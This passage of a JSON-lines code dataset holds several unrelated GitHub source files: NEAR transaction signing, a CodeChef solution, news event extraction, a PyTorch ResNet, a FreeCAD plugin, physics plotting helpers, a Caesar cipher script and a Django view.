deposit\n    action = Action()\n    action.enum = function_call\n    return action\n\n\ndef sign_create_account_tx(\n    creator_signer: signer.Signer,\n    new_account_id: str,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_create_account_action()\n    return sign_and_serialize_transaction(new_account_id, nonce, [action], block_hash, creator_signer)\n\n\ndef sign_create_account_with_full_access_key_and_balance_tx(\n    signer: signer.Signer,\n    new_account_id: str,\n    public_key: bytes,\n    balance: int,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    create_account_action = create_create_account_action()\n    full_access_key_action = create_full_access_key_action(public_key)\n    payment_action = create_transfer_action(balance)\n    actions = [create_account_action, full_access_key_action, payment_action]\n    return sign_and_serialize_transaction(new_account_id, nonce, actions, block_hash, signer)\n\n\ndef sign_delete_access_key_tx(\n    signer: signer.Signer,\n    target_account_id: str,\n    key_for_deletion: bytes,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_delete_access_key_action(key_for_deletion)\n    return sign_and_serialize_transaction(target_account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_payment_tx(\n    signer: signer.Signer,\n    receiver_id: str,\n    amount: int,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_transfer_action(amount)\n    return sign_and_serialize_transaction(receiver_id, nonce, [action], block_hash, signer)\n\n\ndef sign_staking_tx(\n    signer: signer.Signer,\n    validator_key: bytes,\n    amount: int,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_staking_action(amount, validator_key)\n    return sign_and_serialize_transaction(signer.account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_deploy_contract_tx(\n    signer: signer.Signer,\n    code: bytes,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_deploy_contract_action(code)\n    return sign_and_serialize_transaction(signer.account_id, nonce, [action], block_hash, signer)\n\n\ndef sign_function_call_tx(\n    signer: signer.Signer,\n    contract_id: str,\n    method_name: str,\n    args: bytes,\n    gas: int,\n    deposit: int,\n    nonce: int,\n    block_hash: bytes,\n) -> bytes:\n    action = create_function_call_action(method_name, args, gas, deposit)\n    return sign_and_serialize_transaction(contract_id, nonce, [action], block_hash, signer)\n","repo_name":"MAKMED1337/lp3","sub_path":"near/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":9892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"27779101040","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n\ndef find(n):\n    powOf5 = 5\n    ans = 0\n    while powOf5 <= n:\n        ans += n // powOf5\n        powOf5 *= 5\n    print(ans)\n\n\ndef solve():\n    t = int(input())\n    for _ in range(t):\n        n = int(input())\n        find(n)\n\n\nsolve()\n","repo_name":"live-abhishek/ds-algo","sub_path":"codechef/practice/fctrl.py","file_name":"fctrl.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"2562172169","text":"''' Event extraction '''\n# usage: import\n# author: luohuagang\n# version: 0.0.1\n# init: 6/25/2019\n# last: 7/10/2019\n\nimport re\nimport settings\n\n\nclass EventExtraction():\n    ''' Event extraction class\n    '''\n    def __init__(self, context, nlp):\n        # Initialize the event dict, which holds the trigger word, event type,\n        # time, location, rescue organization, accident cause and losses\n        self.nlp_result = nlp.ner_result\n        self.news = context\n        self.event = {}\n\n        
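# Note: having_event() fills self.event['触发词'] (trigger word) and\n        # self.event['事件'] (event type); the dispatch below picks the\n        # extractor matching the detected trigger.\n        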
self.having_event()\n\n        if self.event['触发词'] in settings.FIRE_TRIGGER:\n            self.fire_event()\n        elif self.event['触发词'] == '警示函':\n            self.finance_punishment()\n        elif self.event['触发词'] == '裁员':\n            self.finance_layoffs()\n        elif self.event['触发词'] == '发行股份':\n            self.finance_issuing()\n\n    def fire_event(self):\n        ''' Fire accident event\n        '''\n        # Extract time, location and rescue organizations\n        self.event['火灾时间'] = self.taking_time()[0]\n        self.event['火灾地点'] = self.taking_location()\n        self.event['救援组织'] = self.taking_organization()\n        # Match the accident-cause and accident-loss patterns\n        self.cause = pattern_match(pattern_cause(), self.news)\n        self.lose = pattern_match(pattern_lose(), self.news)\n        self.event['火灾原因'] = \"\".join(self.cause)\n        self.event['伤亡损失'] = self.lose\n\n    def finance_layoffs(self):\n        ''' Layoff event\n        '''\n        event_time = self.taking_time()\n        if event_time:\n            self.event['时间'] = event_time[0]\n        self.event['裁员组织'] = self.taking_organization()\n        self.event['裁员人数'] = self.taking_number()\n\n    def finance_punishment(self):\n        ''' Regulatory punishment event\n        '''\n        event_time = self.taking_time()\n        if event_time:\n            self.event['时间'] = event_time[0]\n        organizations = self.taking_organization()\n        if organizations:\n            self.event['监管组织'] = []\n            self.event['受罚组织'] = []\n            for organization in organizations:\n                if re.search(re.compile(r\"证监会\"), organization):\n                    self.event['监管组织'].append(organization)\n                elif re.search(re.compile(r\"证监局\"), organization):\n                    self.event['监管组织'].append(organization)\n                else:\n                    self.event['受罚组织'].append(organization)\n\n    def finance_issuing(self):\n        ''' Share issuance event\n        '''\n        event_time = self.taking_time()\n        if event_time:\n            self.event['时间'] = event_time[0]\n        self.event['发行组织'] = self.taking_organization()\n        numbers = self.taking_number()\n        for number in numbers:\n            if re.search(r\"[\d.]*?万\", number):\n                self.event['发行量'] = number\n            if re.search(r\"[\d.]*?元\", number):\n                self.event['发行价格'] = number\n        number = re.search(r\"([\d万]+?股)\", self.news)\n        if number:\n            self.event['发行量'] = number[0]\n\n    def having_event(self):\n        ''' Detect the event trigger\n        '''\n        for item in self.nlp_result:\n            if item[1] == 'CAUSE_OF_DEATH':\n                if item[0] in settings.FIRE_TRIGGER:\n                    self.event['触发词'] = item[0]\n                    self.event['事件'] = settings.FIRE_TRIGGER[item[0]]\n                    return\n\n        finance_trigger = [key for key in settings.FINANCE_TRIGGER]\n        re_pattern = re.compile(r\"({})\".format('|'.join(finance_trigger)))\n        match_list = re.findall(re_pattern, self.news)\n        if match_list:\n            self.event['触发词'] = match_list[0]\n            self.event['事件'] = settings.FINANCE_TRIGGER[match_list[0]]\n            return\n\n        # No trigger word found\n        self.event['事件'] = None\n        self.event['触发词'] = None\n\n    def taking_number(self):\n        ''' Extract number/amount expressions\n        '''\n        i = 0\n        state = False\n        having_time = False\n        only_number = True\n        number = \"\"\n        result = []\n        while i < len(self.nlp_result):\n            if self.nlp_result[i][1] in ['DATE', 'TIME']:\n                having_time = True\n            elif self.nlp_result[i][1] in ['NUMBER']:\n                number += self.nlp_result[i][0]\n                state = True\n            elif self.nlp_result[i][1] in ['PERCENT', 'MONEY']:\n                number += self.nlp_result[i][0]\n                state = True\n                only_number = False\n            elif self.nlp_result[i][1] == 'MISC':\n                number += self.nlp_result[i][0]\n                only_number = False\n            else:\n                if state and not having_time and not only_number:\n                    result.append(number)\n                number = \"\"\n                state = False\n                having_time = False\n                only_number = True\n            i += 1\n        if state and not having_time and not only_number:\n            result.append(number)\n\n        result = list(set(result))\n        return result\n\n    def taking_time(self):\n        ''' Extract time expressions\n        '''\n        i = 0\n        state = False\n        time_fire = \"\"\n        result = []\n        while i < len(self.nlp_result):\n            if self.nlp_result[i][1] in 
['DATE', 'TIME']:\n                time_fire += self.nlp_result[i][0]\n                state = True\n            elif self.nlp_result[i][1] in ['NUMBER', 'MISC']:\n                time_fire += self.nlp_result[i][0]\n            else:\n                if state:\n                    result.append(time_fire)\n                    time_fire = \"\"\n                    state = False\n            i += 1\n        if state:\n            result.append(time_fire)\n\n        return result\n\n\n    def taking_location(self):\n        ''' Extract locations\n        '''\n        i = 0\n        state = False\n        location = \"\"\n        result = []\n        while i < len(self.nlp_result):\n            if (self.nlp_result[i][1] == 'LOCATION' or\n                    self.nlp_result[i][1] == 'FACILITY' or\n                    self.nlp_result[i][1] == 'CITY'):\n                location += self.nlp_result[i][0]\n                if not state:\n                    state = True\n            else:\n                if state:\n                    result.append(location)\n                    location = \"\"\n                    state = False\n            i += 1\n        if state:\n            result.append(location)\n\n        result = list(set(result))\n\n        return result\n\n\n    def taking_organization(self):\n        ''' Extract organizations\n        '''\n        i = 0\n        state = False\n        organization = \"\"\n        result = []\n        while i < len(self.nlp_result):\n            if self.nlp_result[i][1] in settings.ORG:\n                organization += self.nlp_result[i][0]\n                if not state:\n                    state = True\n            else:\n                if state:\n                    result.append(organization)\n                    organization = \"\"\n                    state = False\n            i += 1\n        if state:\n            result.append(organization)\n\n        result = list(set(result))\n\n        return result\n\n\ndef pattern_match(patterns, text):\n    ''' Match the given patterns and return the list of matches\n    '''\n    result = []\n\n    for pattern in patterns:\n        match_list = re.findall(pattern, text)\n        if match_list:\n            result.append(match_list[0])\n    return result\n\n\ndef pattern_cause():\n    ''' Patterns for extracting the accident cause\n    '''\n    patterns = []\n\n    key_words = ['起火', '事故', '火灾']\n    pattern = re.compile('.*?(?:{0})原因(.*?)[,.?:;!,。?:;!]'.format('|'.join(key_words)))\n    patterns.append(pattern)\n\n    return patterns\n\n\ndef pattern_lose():\n    ''' Patterns for extracting casualties and losses\n    '''\n    patterns = []\n\n    key_words = ['伤亡', '损失']\n    pattern = re.compile('.*?(未造成.*?(?:{0}))[,.?:;!,。?:;]'.format('|'.join(key_words)))\n    patterns.append(pattern)\n\n    patterns.append(re.compile(r'(\d+人死亡)'))\n    patterns.append(re.compile(r'(\d+人身亡)'))\n    patterns.append(re.compile(r'(\d+人受伤)'))\n    patterns.append(re.compile(r'(\d+人烧伤)'))\n    patterns.append(re.compile(r'(\d+人坠楼身亡)'))\n    patterns.append(re.compile(r'(\d+人遇难)'))\n\n    return patterns\n\n\nif __name__ == '__main__':\n    pass\n","repo_name":"jialin666/EventExtraction","sub_path":"event_extraction.py","file_name":"event_extraction.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"36"}
+{"seq_id":"6400487437","text":"import torch  # used by torch.flatten in _forward_impl\nimport torch.nn as nn\nfrom torch import rand\nfrom torch.hub import load_state_dict_from_url\nimport torchvision\nfrom .blocks import *\n\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n    \"\"\"3x3 convolution with padding\"\"\"\n    return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n                     padding=dilation, groups=groups, bias=False, dilation=dilation)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n    \"\"\"1x1 convolution\"\"\"\n    return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\nclass ResNet(nn.Module):\n\n    def __init__(self, block, choose, layers, num_classes=1000, zero_init_residual=False,\n                 groups=1, width_per_group=64, replace_stride_with_dilation=None,\n                 norm_layer=None):\n        super(ResNet, self).__init__()\n        if norm_layer is None:\n            norm_layer = nn.BatchNorm2d\n        self._norm_layer = norm_layer\n\n        self.inplanes = 64\n        self.dilation = 1\n        if replace_stride_with_dilation is None:\n            # each element in the tuple indicates if we 
should replace\n # the 2x2 stride with a dilated convolution instead\n replace_stride_with_dilation = [False, False, False]\n if len(replace_stride_with_dilation) != 3:\n raise ValueError(\"replace_stride_with_dilation should be None \"\n \"or a 3-element tuple, got {}\".format(replace_stride_with_dilation))\n self.groups = groups\n self.base_width = width_per_group\n self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = norm_layer(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block[choose[0]], 64, layers[0])\n self.layer2 = self._make_layer(block[choose[1]], 128, layers[1], stride=2,\n dilate=replace_stride_with_dilation[0])\n self.layer3 = self._make_layer(block[choose[2]], 256, layers[2], stride=2,\n dilate=replace_stride_with_dilation[1])\n self.layer4 = self._make_layer(block[choose[3]], 512, layers[3], stride=2,\n dilate=replace_stride_with_dilation[2])\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block[0].expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1, dilate=False):\n norm_layer = self._norm_layer\n downsample = None\n previous_dilation = self.dilation\n if dilate:\n self.dilation *= stride\n stride = 1\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n norm_layer(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample, self.groups,\n self.base_width, previous_dilation, norm_layer))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes, groups=self.groups,\n base_width=self.base_width, dilation=self.dilation,\n norm_layer=norm_layer))\n\n return nn.Sequential(*layers)\n\n def _forward_impl(self, x):\n # See note [TorchScript super()]\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.fc(x)\n\n return x\n\n def forward(self, x):\n return self._forward_impl(x)\n\n\ndef _resnet(arch, block, layers, pretrained, progress, **kwargs):\n model = ResNet(block, layers, **kwargs)\n if pretrained:\n state_dict = load_state_dict_from_url(model_urls[arch],\n progress=progress)\n model.load_state_dict(state_dict)\n return model\n\n\n\nfrom thop import profile\ndef resnet18(Block=[], choose=[0,0,0,0], num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-18 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Block, choose=choose, layers=[2,2,2,2], 
num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet34(SEBasicBlock, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBasicBlock, [3, 4, 6, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet50(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 4, 6, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n\n return model\n\n\ndef resnet101(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 4, 23, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\ndef resnet152(SEBottleneck, num_classes=1_000, groups=1):\n \"\"\"Constructs a ResNet-152 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(SEBottleneck, [3, 8, 36, 3], num_classes=num_classes, groups=groups)\n model.avgpool = nn.AdaptiveAvgPool2d(1)\n return model\n\n\n\nif __name__==\"__main__\":\n x = rand((1,3,224,224))\n # net = torchvision.models.resnet18()\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n #\n #\n #\n # net = resnet18(SKBasicBlock, 3)\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n # net = resnet18(SEBasicBlock, 3)\n #\n # flops, params = profile(net, inputs=(x,))\n # # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n # print(params / 1000 / 1000)\n # print(flops / 1000 / 1000 / 1000)\n net = resnet18(BasicBlock, 3, groups=32)\n print(net(x).shape)\n flops, params = profile(net, inputs=(x,))\n # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n print(params / 1000 / 1000)\n print(flops / 1000 / 1000 / 1000)\n net = resnet18(Bottleneck, 3, groups=32)\n print(net(x).shape)\n flops, params = profile(net, inputs=(x,))\n # summary(resnet, input_size=(3, 224, 224), batch_size=-1, device=\"cpu\")\n print(params / 1000 / 1000)\n print(flops / 1000 / 1000 / 1000)","repo_name":"TommyLitlle/LCRNet","sub_path":"models/resnet_by_layer.py","file_name":"resnet_by_layer.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"8639689173","text":"import FreeCAD\nfrom plugin.plugin_loader import register_plugin\nfrom plugin.plugin import Plugin\n\nLog = FreeCAD.Console.PrintMessage\n\n\n@Plugin.register\nclass VirSatFilePlugin(Plugin):\n '''\n Legacy Plugin that directly im-/exports a JSON file\n '''\n def importToDict(self, project_directory):\n from PySide2.QtWidgets import QFileDialog\n import json\n\n # call pyqt dialog: returns (filename, filter)\n filename = QFileDialog.getOpenFileName(\n None, # ui parent\n \"Open JSON file\", # dialog caption\n project_directory,\n \"JSON(*.json)\")[0]\n\n if filename != 
'':\n            Log(f\"Selected file '{filename}'\n\")\n\n            with open(filename, 'r') as f:\n                try:\n                    return json.load(f)\n                except ValueError as error:\n                    Log(f\"ERROR: Invalid JSON found: '{error}'\n\")\n                    Log(\"Please provide a valid JSON\n\")\n                    return\n\n    def exportFromDict(self, data_dict, project_directory):\n        from PySide2.QtWidgets import QFileDialog\n        import json\n\n        # call pyqt dialog: returns (filename, filter)\n        filename = QFileDialog.getSaveFileName(\n            None,  # ui parent\n            \"Save JSON file\",  # dialog caption\n            project_directory,\n            \"JSON(*.json)\")[0]\n        if filename != '':\n            json_str = json.dumps(data_dict)\n\n            with open(filename, 'w') as file:\n                file.write(json_str)\n\n\nregister_plugin(VirSatFilePlugin(\"Virtual Satellite File Plugin (Legacy)\", \"VirtualSatelliteFilePlugin\", False))\n","repo_name":"virtualsatellite/VirtualSatellite4-FreeCAD-mod","sub_path":"VirtualSatelliteCAD/plugins/VirtualSatelliteFilePlugin/init_plugin.py","file_name":"init_plugin.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"36"}
+{"seq_id":"73609826025","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom cued.utility import ConversionFactors as co\n\n\ndef time_grid(time, kpath, electric_field, current, band_structure,\n              density_center, standard_deviation, e_fermi=0.2,\n              electric_field_legend=None, current_legend=None,\n              band_structure_legend=None, density_center_legend=None,\n              standard_deviation_legend=None, timelim=None, energylim=None,\n              bzboundary=None, savename=None, si_units=True):\n\n    if (si_units):\n        time *= co.au_to_fs\n        kpath /= co.au_to_as\n        electric_field *= co.au_to_MVpcm\n        current *= co.au_to_Amp\n        band_structure *= co.au_to_eV\n        density_center /= co.au_to_as\n        standard_deviation /= co.au_to_as\n    else:\n        e_fermi *= co.eV_to_au\n\n    ########################################\n    # Electric field\n    ########################################\n    ax1 = plt.subplot2grid((2, 6), (0, 0), colspan=3)\n    ax1.plot(time, electric_field.T)\n    if (si_units):\n        ax1.set_xlabel(r'$t \text{ in } \si{fs}$')\n        ax1.set_ylabel(r'$E \text{ in } \si{MV/cm}$')\n    else:\n        ax1.set_xlabel(r'$t \text{ in atomic units}$')\n        ax1.set_ylabel(r'$E \text{ in atomic units}$')\n\n    ax1.set_title(r'Electric Field')\n    ax1.grid(which='major', axis='x', linestyle='--')\n    if (electric_field_legend is not None):\n        ax1.legend(electric_field_legend)\n\n    ########################################\n    # Current\n    ########################################\n    ax2 = plt.subplot2grid((2, 6), (0, 3), colspan=3)\n    ax2.plot(time, current.T)\n    if (si_units):\n        ax2.set_xlabel(r'$t \text{ in } \si{fs}$')\n        ax2.set_ylabel(r'$j \text{ in } \si{A}$')\n    else:\n        ax2.set_xlabel(r'$t \text{ in atomic units}$')\n        ax2.set_ylabel(r'$j \text{ in atomic units}$')\n    ax2.yaxis.set_label_position(\"right\")\n    ax2.yaxis.tick_right()\n\n    ax2.set_title(r'Current Density')\n    ax2.grid(which='major', axis='x', linestyle='--')\n    ax2.axhline(y=0, linestyle='--', color='grey')\n    if (current_legend is not None):\n        ax2.legend(current_legend)\n\n    ########################################\n    # Band structure\n    ########################################\n    kpath_min = np.min(density_center)\n    kpath_max = np.max(density_center)\n    ax3 = plt.subplot2grid((2, 6), (1, 0), colspan=2)\n    # Number of band structures to plot\n    band_num = np.size(band_structure, axis=0)\n    ax3.plot(band_structure.T, np.tile(kpath, (band_num, 1)).T)\n    if (si_units):\n        ax3.set_xlabel(r'$\epsilon \text{ in } \si{eV}$')\n        
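# Note: these labels rely on siunitx-style macros (\si, \text), which\n        # assume matplotlib's LaTeX (usetex) rendering with siunitx loaded;\n        # the default mathtext parser cannot render them.\n        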
ax3.set_ylabel(r'$k \\text{ in } \\si{1/\\angstrom}$')\n else:\n ax3.set_xlabel(r'$\\epsilon \\text{ in atomic units}$')\n ax3.set_ylabel(r'$k \\text{ in atomic units}$')\n if (energylim is not None):\n ax3.set_xlim(energylim)\n ax3.axvline(x=e_fermi, linestyle=':', color='black')\n ax3.set_ylim(-kpath_max*1.05, kpath_max*1.05)\n ax3.axhline(y=kpath_min, linestyle='--', color='grey')\n ax3.axhline(y=0, linestyle='--', color='grey')\n ax3.axhline(y=kpath_max, linestyle='--', color='grey')\n\n ax3.set_title(r'Band Structure')\n if (band_structure_legend is not None):\n ax3.legend(band_structure_legend)\n\n ########################################\n # Density data\n ########################################\n ax4 = plt.subplot2grid((2, 6), (1, 2), colspan=2, sharey=ax3)\n ax4.plot(time, density_center[:-1].T)\n ax4.plot(time, density_center[-1], linestyle=':', color='red')\n if (si_units):\n ax4.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n else:\n ax4.set_xlabel(r'$t \\text{ in atomic units}$')\n ax4.set_title(r'Density Center of Mass')\n ax4.grid(which='major', axis='x', linestyle='--')\n ax4.axhline(y=kpath_min, linestyle='--', color='grey')\n ax4.axhline(y=0, linestyle='--', color='grey')\n ax4.axhline(y=kpath_max, linestyle='--', color='grey')\n plt.setp(ax4.get_yticklabels(), visible=False)\n if (density_center_legend is not None):\n ax4.legend(density_center_legend)\n\n ax5 = plt.subplot2grid((2, 6), (1, 4), colspan=2)\n ax5.set_title(r'Density Standard Deviation')\n ax5.plot(time, standard_deviation.T)\n ax5.yaxis.set_label_position(\"right\")\n ax5.yaxis.tick_right()\n if (si_units):\n ax5.set_xlabel(r'$t \\text{ in } \\si{fs}$')\n ax5.set_ylabel(r'$\\sigma \\text{ in } \\si{1/\\angstrom}$')\n else:\n ax5.set_xlabel(r'$t \\text{ in atomic units}$')\n ax5.set_ylabel(r'$\\sigma \\text{ in atomic units}$')\n\n if (standard_deviation_legend is not None):\n ax5.legend(standard_deviation_legend)\n\n if (timelim is not None):\n ax1.set_xlim(timelim)\n ax2.set_xlim(timelim)\n ax4.set_xlim(timelim)\n ax5.set_xlim(timelim)\n\n if (bzboundary is not None):\n ax3.set_title(r'Band Structure $k_\\mathrm{BZ}='\n + '{:.3f}'.format(bzboundary) + r'[\\si{1/\\angstrom}]$')\n ax3.axhline(y=bzboundary, linestyle=':', color='green')\n ax3.axhline(y=-bzboundary, linestyle=':', color='green')\n ax4.axhline(y=bzboundary, linestyle=':', color='green')\n ax4.axhline(y=-bzboundary, linestyle=':', color='green')\n\n plt.tight_layout()\n if (savename is not None):\n plt.savefig(savename)\n else:\n plt.show()\n\n\ndef time_dir_ortho_angle(time, current_dir, current_ortho, current_legend=None,\n savename=None, si_units=True):\n\n if si_units:\n time *= co.au_to_fs\n current_dir *= co.au_to_Amp\n current_ortho *= co.au_to_Amp\n\n time = time.real\n current_dir = current_dir.real\n current_ortho = current_ortho.real\n\n _fig, ax = plt.subplots(2)\n ax[0].plot(time, current_dir.T, marker='.')\n ax[0].plot(time, current_ortho.T, linestyle='--')\n\n angle_data = np.arctan(current_ortho/current_dir)\n ax[1].plot(time, angle_data.T)\n\n if savename is None:\n plt.show()\n else:\n plt.savefig(savename)\n\n\ndef time_dir_ortho(time, current_dir, current_ortho, xlim=None, ylim=None,\n xlabel=r'Time in atomic units', ylabel=r'Current in atomic units',\n marker=None, paramlegend=None, supertitle=None, title=None, savename=None,\n si_units=True):\n\n time = time.real\n current_dir = current_dir.real\n current_ortho = current_ortho.real\n\n if si_units:\n time *= co.au_to_fs\n current_dir *= co.au_to_Amp*1e5\n current_ortho *= 
co.au_to_Amp*1e5\n xlabel = r'Time in fs'\n ylabel = r'Current in $\\si{\\mu A}$'\n\n _fig, ax = plt.subplots(1)\n for t, c_dir, c_ort in zip(time, current_dir, current_ortho):\n _lines_dir = ax.plot(t, c_dir, marker=marker)\n # _lines_ortho = ax.plot(t, c_ort, linestyle='--', marker=marker)\n plt.gca().set_prop_cycle(None)\n # _lines_ortho = ax.plot(time.T, current_ortho.T, linestyle='--', marker=marker)\n\n ax.grid(True, axis='x', ls='--')\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n if xlim is not None:\n ax.set_xlim(xlim)\n\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if paramlegend is not None:\n ax.legend(paramlegend)\n\n if supertitle is not None:\n plt.suptitle(supertitle)\n\n if title is not None:\n ax.set_title(title)\n\n if savename is not None:\n plt.savefig(savename)\n else:\n plt.show()\n","repo_name":"ccmt-regensburg/CUED","sub_path":"cued/plotting/time_plots.py","file_name":"time_plots.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"30867218191","text":"'''\r\nAuthor: Jason Brown\r\nStudent ID: 469730808\r\nDate: 11/09/22\r\n'''\r\n\r\n''' This program will combine functions created in task 1 and task 2 to produce caesar cipher code in one command line interface '''\r\n# load import modules\r\nimport sys\r\nsys.tracebacklimit=0\r\n\r\n# create a list and variables to store user inputs\r\nalphaList = list(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\") # list will contain all uppercase alphabet characters only\r\n\r\n# define argument variables\r\nshift=\"\" # placeholder for user error checking\r\ntext=sys.argv[2]\r\n\r\n# checks for user input errors on the command line\r\nwhile shift == \"\" :\r\n try:\r\n shift = int(sys.argv[1]) % 26\r\n except (ValueError, TypeError):\r\n print(\"ERROR 01 - Please only use whole number values for argument 1 (shift value) \")\r\n break\r\n\r\n# combined functions to produce encrypted text from converted text\r\ndef encrypt_Caesar(shift, text):\r\n rep=text.replace(\".\", \"X\")\r\n repJoin=\"\".join(char for char in rep if char.isalpha())\r\n output=(repJoin.upper())\r\n shiftedAlpha = alphaList[shift:] + alphaList[:shift] \r\n cipherList = [] \r\n for words in output: \r\n prepText = \"\" \r\n for letter in words: \r\n prepText += shiftedAlpha[alphaList.index(letter)] \r\n cipherList.append(prepText) \r\n global encryptedText\r\n encryptedText = (\"\".join(cipherList)) \r\n return encryptedText \r\n \r\nencryptedText=encrypt_Caesar(shift, text)\r\nprint(\"Encrypted text is: \", encryptedText, end=\"\")","repo_name":"J68B/TAFE-Beginner_Python_Code_T2","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10070161227","text":"from django.shortcuts import render\nfrom .models import employee\n\n# Create your views here.\ndef showindex(request):\n emp = employee.objects.all()\n return render(request, \"index.html\",{\"pro\":emp})\ndef display(request):\n from .models import employee\n emp = employee.objects.all()\n Eid=int(request.POST.get(\"id\"))\n Ename=request.POST.get(\"name\")\n Ecno=int(request.POST.get(\"cno\"))\n Esal=float(request.POST.get(\"sal\"))\n from app7.models import employee\n e1=employee(Eid,Ename,Ecno,Esal)\n e1.save()\n emp = employee.objects.all()\n return render(request,\"index.html\",{\"pro\":emp})\n\ndef deletedetails(request):\n del_id=int(request.POST.get(\"delete_id\"))\n 
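# Note: 'delete_id' is read from the POSTed form; filter(id=...).delete()\n    # removes the matching employee row before the list page is re-rendered.\n    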
